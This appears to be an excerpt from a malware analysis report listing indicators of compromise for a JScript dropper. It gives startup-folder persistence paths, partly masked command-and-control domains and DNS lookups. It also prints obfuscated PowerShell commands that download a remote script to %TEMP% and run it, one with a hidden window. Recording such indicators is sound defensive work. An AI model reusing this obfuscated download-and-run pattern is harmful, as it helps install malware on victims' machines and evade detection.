Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\f1turo.js
- %TEMP%\f1turo.js
- http://tr######e.sslblindado.com/g1
- DNS ASK tr######e.sslblindado.com
- DNS ASK 12##.hopto.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\f1turo.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://tr######e.sslblindado.com/g1'',$env:TEMP+''\\''+''f1turo.js'')'|D; start-pr...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://tr######e.sslblindado.com/g1'',$env:TEMP+''\\''+''f1turo.js'')'|D; start-pr...